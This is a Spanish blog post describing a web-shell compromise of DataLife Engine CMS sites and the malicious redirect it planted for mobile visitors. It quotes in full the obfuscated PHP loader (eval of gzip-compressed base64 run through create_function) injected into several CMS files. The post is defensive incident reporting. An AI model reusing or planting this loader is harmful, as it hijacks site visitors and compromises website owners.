
Recientemente el CMS de Datalife Engine fue atacado por algún desocupado el cual creo una puerta trasera o phpshell (Backdoor:PHP/WebShell) en unos de sus directorios. Una vez que tuvo acceso con esta puerta trasera pudo infectar algunos de los archivos de php en el CMS de datalife engine, con un código ofuscado del php. Leer mas sobre este tema...
Hay varios métodos para estas ediciones, pueden ser vulnerabilidades de ejecución de código remoto (todo POST o GET que se use en el código debe ser primero santizado) o de inclusión de ficheros, pudiendo subir una phpshell (es como un administrador de ficheros) que le permitiría editar los ficheros deseados y añadir este tipo de código donde lo requiera, tras esto normalmente eliminan la phpshell para no dejar rastro.
Ahora le toco a otro dominio mundopoetico.es, con el mismo principio inyecto el siguiente código en /engine/classes/mysql.php: $liciens = "@Ev"."aL(gZu"."ncOmp"."rEss(bAs"."e64"."_Dec"."odE('eF6dVG1P2zAQ/itFqnAiWFoorEAVjYGqDW0aGy+bpg1FTnxNvCZ2ZjsUtOO/75wwdaCqk/YhPvven7vL9W0ly5glrBexpPGnBdM+pD9FwiZyFkhrwQX95PT8/N3Z9FvfG92E4a9jYmdazyUELW/7mcrWzraTFQTh1sH+4f54mw1YOHkgh8HxM804Zoe7e+PhaHzAQm3WyA/Xyw+G/5DvsFWJs+FouDfeP9wbj9gy54Pxfpdz38xicnk5vfg8vfhmnTFwGxBxuqlrMAEzYGAGJqmdKyjAzaTfGPmXCbuYfrqeXl4l1xdnjKSkvd6hNE3iLDQ/qR3e33G/0DZeZ+GsLpbxC+CCuI96bPRK5llUV853dWBl4Qb+Ns+gyFpWlkWe5kZ78mK0aLmDI1u3Jq7oHSndzoTjrYV+z0IimxZ0OzAEiIjhi8aUoDItqLRm1qrU3PAKHJj4e38O9wttBJnRw8JmY+IdsluBJ/67ppsE6pl3VjhXHw08Dl8bOkk9DCdwJ93k4X86ZvP1Jk5BzhMDtlla+WHeWLb57dXVx+SaXsnrN9MPV+zGD+MaMc1lO68btYE8qbjLioANUi5FgxlhRV5ojTKvOJ5oh7WkpiKv0hLwKz8xeoFUE3p8GZ0mOC0dP1P4JQeHXAm4Q8kTbrICtc5JKSUPFZdlNJBs28MN6VcgAE9it4ZRp2dQKut4TnEVtQ+7vBrXpEBnlN53mWmh9BybUuc44xmkOkI9j0yDt/Mo013wCEWTzf2HVue6QVuAIlvFbz0iXUZZh8vgQjofzEKb+r2vAOVjFWnQv7qLJs0iTKXKOxw0ZC2KpzDqKKXq0DJDnUrC/mO3AryvUskVWqLaohJGS4GVFDWCkWC/914OsXBZQjwlsS60gmWpqDDBxrNNyEQJSUNREimo1yt1/mzLVvYkx5gLoWBhkSonVVQXNXJRPd5o/HNpfSHiGYBIOVUuLn3pXKdFQsOd1KpL0cguhL/1NuKe31urFt3jGh2zVav54eE3UbcLlg==')));";$release_this = "cre"."ate_"."function";if (@function_exists($release_this)){@$dle_func = $release_this('', "$liciens;");$dle_func('');}
Y en estos /engine/data/dbconfig.php, /engine/inc/options.php:$dle'.'_lic = "@Ev'.'"."AL(gZu'.'"."nC'.'Omp"."rEss(bA'.'S"."e'.'64"."_D'.'ec"."odE('eF6dVG1v2zgM/ispEFQ21jlp0y5tA2O9DcGuuMO668uGYSsM2WZsXWzRJ8nNirH//Si7Q9qty4B9sGhJD18ekuLQ1qpSFmORiEEkktavFky3UX7NExQztQiUteCCYfL67Oyv0/mn4b3idRh+PeGbDHGpIPh2vPMj8NnujlM1BOGzw4Ojg+mOGIlwdseWg5MfwXEsjvb2p+PJ9EiEaDZCDse/huz+GrInfkJFjCfj/enB0f50ItYUDqcHPYWhWcRs+GJ+/n5+/sk6Y+AmYOGwbRowgTBgYAEmaZwr2cf1bNga9UBFnM//uZpfXCZX56eCbxm92aAybeIstP9xnby9k2GJNt6k4SyWa/8lyJxP73Fi8lIVWdTUzpd7ZFXpRv5vmUGZdUdZFnlZGPTi+WTVnY6ObdOpuHJwrLFrFic7DfxbhCy2LWDXSUyIhZGr1lSgM8w5u2bRQRppZA0OTPx5uITbFZqc1XhjYbs18S7rPcEnfpjTbSb1nXVROtccjzwPnxteGR6GM/ii3Ozudypmi80qTkMhEwO2XWv53t5al/nPy8t3yRXvkj/ezN9eimvfkhuuuTW7rt1qDBRJLV1WBmKUSpW3lDFXkiUiqaKW9AodNYqLSrJOK6CP8pXBFXFOePNh8jqheeXkqaYPBTiSOocvpGQiTVYSYsGglC3UUlXRSIkdTzfk18AEHvnuFKMeZ0hp62TBfjWXj/q4WtemwGuU3vaRYa5xSW2FBS1kBilGhMvItHSzjDLsnUeUt9nSf2SxwJZsCZp1tbzxjLCKsp6XoZVy3pmFLvRbnwGOx2pG8HPdI5NmEaVKFz0PbrKOxWMaTZRydnjKEaaKuf+7VwPd1qmSmixLtKRzgyqnWuUNgVFgPw9ejKl0WcJnWlFTooZ1qjgxwdZ3E1LkFSQte0lUzrV+EvNginbXj8KMZZ5rWFni5CkdNWVDMq/v//gFFMr6XMQLgDyVnLy48tlzPYovjXQKdR+lUb0L/zfYigd+dP1k3N0P3ql4al7f3f0P9ywaOQ==')));";$lic_'.'true = "cre'.'"."ate_"."func'.'tion";if(@func'.'tion_exi'.'sts($lic_'.'true)){@$dle'.'_conf = $lic'.'_tr'.'ue('', "$dle_lic;");$dle_'.'conf('');}
Decodificando el código vemos que usaba el user_agent del acceso y si era un dispositivo móvil le asignaba una cookie y redireccionaba hacía una lanzadera externa, en cambio si la visita venía desde el buscador, equipo de sobremesa o similar, no realizaba ninguna acción:
Después de limpiar el código ofuscado y de eliminar la puerta trasera el sitio web se muestra con normalidad y sin publicidad para adultos.
Acontinuacion les dejare una captura de pantalla de esa mierda de publicidad (A saber que esta era la que mas salía pero son muchas en si ).

Y en conclusión hay que tener mas cuidado con las actualizaciones de seguridad del CMS (sistema de gestión de contenido), módulos, complementos y demás.
Recomendamos leer: Virus en el sistema DataLife Engine (DLE) y cómo tratarlos...
Comentarios